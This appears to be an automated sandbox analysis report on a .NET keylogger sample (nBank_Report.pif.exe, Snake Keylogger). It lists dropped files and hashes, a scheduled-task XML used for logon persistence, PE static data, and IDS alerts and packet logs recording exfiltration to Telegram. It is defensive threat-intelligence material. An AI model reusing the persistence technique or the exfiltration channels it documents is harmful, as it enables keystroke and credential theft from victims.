                                              SHA-512:8BA13FB7012FABAA5060E958D7443D91D938F93DE8A7833DCEEBCA583492EF05A237C2E9C5C758BE06F02F5D7F07FD2084DF733EA76FCFE6C5FCF5959EC2C495
                                              Malicious:false
                                              Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e1mxjv2f.lly.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kbrz1ysr.d2a.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mwdxhkuf.gqw.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uigdoxfc.3su.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\tmp6F97.tmp

                                              Download File
                                              Process:C:\Users\user\Desktop\nBank_Report.pif.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1573
                                              Entropy (8bit):5.120234117252799
                                              Encrypted:false
                                              SSDEEP:48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTcv:He7XQBBYrFdOFzOz6dKrsum
                                              MD5:9852E7ECFC3DD1B3414126B82FCDC7DF
                                              SHA1:ECDC3080E00D7836B596A97466A7E63963F32407
                                              SHA-256:DFE77B49793B3D6335823D342E72322D4398365C8876A1481BC67DA5953D5170
                                              SHA-512:51EEDC0C65698236926CA5F5947BF7A8A253598F4AFFD541611DB66B326CAD41674EE2F3A3B533060EF184DD05E27DCF8C213F2887A78953CD10C140BEBD6385
                                              Malicious:true
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                                              C:\Users\user\AppData\Local\Temp\tmp8A91.tmp

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1573
                                              Entropy (8bit):5.120234117252799
                                              Encrypted:false
                                              SSDEEP:48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTcv:He7XQBBYrFdOFzOz6dKrsum
                                              MD5:9852E7ECFC3DD1B3414126B82FCDC7DF
                                              SHA1:ECDC3080E00D7836B596A97466A7E63963F32407
                                              SHA-256:DFE77B49793B3D6335823D342E72322D4398365C8876A1481BC67DA5953D5170
                                              SHA-512:51EEDC0C65698236926CA5F5947BF7A8A253598F4AFFD541611DB66B326CAD41674EE2F3A3B533060EF184DD05E27DCF8C213F2887A78953CD10C140BEBD6385
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                                              C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\nBank_Report.pif.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):945664
                                              Entropy (8bit):7.483680250208119
                                              Encrypted:false
                                              SSDEEP:24576:44E53gielVPJjLaSCR/avTRbonhF3ia8BbZOu:448/eTRjLUR6TRbI8a8BbZ
                                              MD5:D97C2259E60A42AEAD2559F198FF9A5A
                                              SHA1:5861E84DF676AF552106AB15C308AD44662A563A
                                              SHA-256:903B831A6844FE65857FC4084226322434C939FF5FB4425DA901BFED34399FD4
                                              SHA-512:087232C285836B3EF7DD7C87C955A240425DDEE96EC5FBA0BCCA7137207BE68EAED4D5ECD507AEA1DC2BEC944B97FD2B9A34805F73E02078BD61404008E184F7
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 42%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._1!...............0..J...".......i... ........@.. ....................................@.................................Wi..O....................................R..p............................................ ............... ..H............text....I... ...J.................. ..`.rsrc............ ...L..............@..@.reloc...............l..............@..B.................i......H........]...3......#....................................................{....*"..}....*....0..f...........3...%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%..r...p.}.....(.....*...0.._........s....}.....s....}......}.....(.......(......{....(.......{....(......{....(.......{....(.....*..0............{....r...po.......o.....+d..(.......{......3...%..oB....%.r...p.%..oF......(.....%.r...p.%..oD......(.....%.(.....(....o........(....-...........o ...

                                              C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Users\user\Desktop\nBank_Report.pif.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              C:\Users\user\Documents\SnakeKeylogger\Screenshot.png

                                              Download File
                                              Process:C:\Users\user\Desktop\nBank_Report.pif.exe
                                              File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):673496
                                              Entropy (8bit):7.92342153945732
                                              Encrypted:false
                                              SSDEEP:12288:7i6qcRAKB43AgBVP5KgbEzs9YXlqnfMjJSp+O9JUcwQiVpfTb6C4Jg3p1:m63RAPwgBVhz4oeUf9qfyXgr
                                              MD5:B1DADBB9A762799CDD775B3F43759C74
                                              SHA1:9474EDD0F39B74E4115304C7FCA2C015CB79E9E9
                                              SHA-256:6FA180B5F36674BBC832068E79973F7ECC222CA36631EEC54303A219AC246F9C
                                              SHA-512:50EE0DB9118A5DD7EBD36834B4A8D5CEF973B215A6F1B13D598D249AB4560C4F38B1464937EB5A2F2B38BE5B56394B00DBC42AC558C9CDF076FA1CA69765C1D4
                                              Malicious:false
                                              Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..i.mUy.....i.....m......7..s....hN.R.u...E.Zc]....A..F.AM4.. ..u-......T.q.......}..Zk.M..=....o.s..I...}.N..g...t...C..F...Nxf(.....q.;,2g._.......y..._B....{M..8.:z..W..:_~<.\.I.s.....9...b.....[7...:....:\<6..a...L.:w..<2...k..=..=6i:.>4.S_.;..?.25O..{`^L}....3?.(.O.7.S..O.;o:...e...VS..g...=.........Mg....2..;..C?.....m..HL}`nt...@......5.K....S.Mu.....L.{0K..W...u.@...3..[3.o..z.-=.[..2e...k..ws;.Z.z.z.M3....}o....>7T.7__-}.M.}n....o.L...<..j8.T..`i...9...uU.M.......)>...3...{.,.;..K..j`.<t.xMF.=.mc+.tc.l.t.WW.o.*.\,K..sK..&..yM..f.T?.....vu5......Ug.+...7..bZ.....qm.".,O.Rb..q.ui...c=....|y.=6.>...8,...j......;..N.g.;^..V.~m.|.tn.{-.]....;\Vu..4..;....../..;...5,.5}V.;._...ryf...s........g].~..;^.G..[.C:..t..?..r=l...|B.m..Lo{qZS.......d.:bS.s.N..........m..M..nqa...sX.M:....|..g..*.O..K.Lu._XMo.>7..N.'..Vl.~.)...;..Wu7. .u6=?.T......

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.483680250208119
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              File name:nBank_Report.pif.exe
                                              File size:945'664 bytes
                                              MD5:d97c2259e60a42aead2559f198ff9a5a
                                              SHA1:5861e84df676af552106ab15c308ad44662a563a
                                              SHA256:903b831a6844fe65857fc4084226322434c939ff5fb4425da901bfed34399fd4
                                              SHA512:087232c285836b3ef7dd7c87c955a240425ddee96ec5fba0bcca7137207be68eaed4d5ecd507aea1dc2bec944b97fd2b9a34805f73e02078bd61404008e184f7
                                              SSDEEP:24576:44E53gielVPJjLaSCR/avTRbonhF3ia8BbZOu:448/eTRjLUR6TRbI8a8BbZ
                                              TLSH:D515E1D614C88D99E8A247F50179FE76232B3FBDA1C1E45E55D1399332A931230BBE83
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._1!...............0..J...".......i... ........@.. ....................................@................................

                                              File Icon

                                              Icon Hash:64810d4d25285616

                                              Static PE Info

                                              General

                                              Entrypoint:0x4b69aa
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0xBE21315F [Fri Jan 30 12:26:07 2071 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb69570x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x31e84.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xea0000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xb52f00x70.text
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000xb49b00xb4a00b777960cfd838b18460ffa8e56839268False0.9454706423010381data7.893344076721277IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0xb80000x31e840x32000979c730265b61e6861b7f3b1f45aedb9False0.2504345703125data4.147058689825412IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0xea0000xc0x20002013f9d9b9667f1a50192d1f21aee14False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0xb81300x31828Device independent bitmap graphic, 192 x 512 x 32, image size 196608, resolution 2834 x 2834 px/m0.2487918655568267
                                              RT_GROUP_ICON0xe99580x14data1.05
                                              RT_VERSION0xe996c0x32cdata0.4273399014778325
                                              RT_MANIFEST0xe9c980x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-09-26T11:33:23.027672+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049705132.226.247.7380TCP
                                              2024-09-26T11:33:24.168313+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049705132.226.247.7380TCP
                                              2024-09-26T11:33:24.731573+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049708188.114.96.3443TCP
                                              2024-09-26T11:33:25.465209+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049709132.226.247.7380TCP
                                              2024-09-26T11:33:26.027125+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049710188.114.96.3443TCP
                                              2024-09-26T11:33:29.394619+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049715188.114.96.3443TCP
                                              2024-09-26T11:33:29.730778+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049714132.226.247.7380TCP
                                              2024-09-26T11:33:30.605753+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049714132.226.247.7380TCP
                                              2024-09-26T11:33:31.198796+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049719188.114.96.3443TCP
                                              2024-09-26T11:33:31.933901+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049721132.226.247.7380TCP
                                              2024-09-26T11:33:32.490995+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049723188.114.96.3443TCP
                                              2024-09-26T11:33:33.345164+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049726188.114.96.3443TCP
                                              2024-09-26T11:33:36.365301+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049735188.114.96.3443TCP
                                              2024-09-26T11:33:40.754476+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.1049740149.154.167.220443TCP
                                              2024-09-26T11:33:51.413512+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.1049745149.154.167.220443TCP
                                              2024-09-26T11:33:53.039904+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.1049746149.154.167.220443TCP
                                              2024-09-26T11:33:54.402488+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.1049747149.154.167.220443TCP
                                              2024-09-26T11:33:58.153767+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.1049749149.154.167.220443TCP
                                              2024-09-26T11:34:01.617431+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.1049751149.154.167.220443TCP
                                              2024-09-26T11:34:05.199736+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.1049753149.154.167.220443TCP
                                              2024-09-26T11:34:09.006114+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.1049755149.154.167.220443TCP
                                              2024-09-26T11:34:12.276265+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.1049757149.154.167.220443TCP
                                              2024-09-26T11:34:15.612041+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.1049760149.154.167.220443TCP
                                              2024-09-26T11:34:19.476772+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.1049762149.154.167.220443TCP
                                              2024-09-26T11:34:22.738009+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.1049764149.154.167.220443TCP
                                              2024-09-26T11:34:26.381197+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.1049766149.154.167.220443TCP
                                              2024-09-26T11:34:29.685168+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.1049768149.154.167.220443TCP
                                              2024-09-26T11:34:33.069221+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.1049770149.154.167.220443TCP
                                              2024-09-26T11:34:36.351719+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.1049772149.154.167.220443TCP
                                              2024-09-26T11:34:39.763010+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.1049774149.154.167.220443TCP
                                              2024-09-26T11:34:43.035445+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.1049776149.154.167.220443TCP
                                              2024-09-26T11:34:46.343009+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.1049778149.154.167.220443TCP
                                              2024-09-26T11:34:49.954596+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.1049780149.154.167.220443TCP
                                              2024-09-26T11:34:53.395041+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.1049782149.154.167.220443TCP
                                              2024-09-26T11:34:56.736137+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.1049784149.154.167.220443TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 26, 2024 11:33:22.024394035 CEST4970580192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:22.029268026 CEST8049705132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:22.029345036 CEST4970580192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:22.029629946 CEST4970580192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:22.034373045 CEST8049705132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:22.693856001 CEST8049705132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:22.746393919 CEST4970580192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:22.770607948 CEST4970580192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:22.775476933 CEST8049705132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:22.978012085 CEST8049705132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:23.027672052 CEST4970580192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:23.220381021 CEST49706443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:23.220433950 CEST44349706188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:23.220516920 CEST49706443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:23.237586021 CEST49706443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:23.237626076 CEST44349706188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:23.716659069 CEST44349706188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:23.716752052 CEST49706443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:23.722121954 CEST49706443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:23.722136021 CEST44349706188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:23.722498894 CEST44349706188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:23.777607918 CEST49706443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:23.796750069 CEST49706443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:23.843406916 CEST44349706188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:23.905586958 CEST44349706188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:23.905853987 CEST44349706188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:23.905908108 CEST49706443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:23.912029028 CEST49706443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:23.916604042 CEST4970580192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:23.921619892 CEST8049705132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:24.121007919 CEST8049705132.226.247.73192.168.2.10
                                              Sep 26, 2024 11:33:24.124530077 CEST49708443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:24.124579906 CEST44349708188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:24.124644041 CEST49708443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:24.124957085 CEST49708443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:24.124974966 CEST44349708188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:24.168313026 CEST4970580192.168.2.10132.226.247.73
                                              Sep 26, 2024 11:33:24.584798098 CEST44349708188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:24.588365078 CEST49708443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:24.588406086 CEST44349708188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:24.731580973 CEST44349708188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:24.731676102 CEST44349708188.114.96.3192.168.2.10
                                              Sep 26, 2024 11:33:24.731803894 CEST49708443192.168.2.10188.114.96.3
                                              Sep 26, 2024 11:33:24.733881950 CEST49708443192.168.2.10188.114.96.3
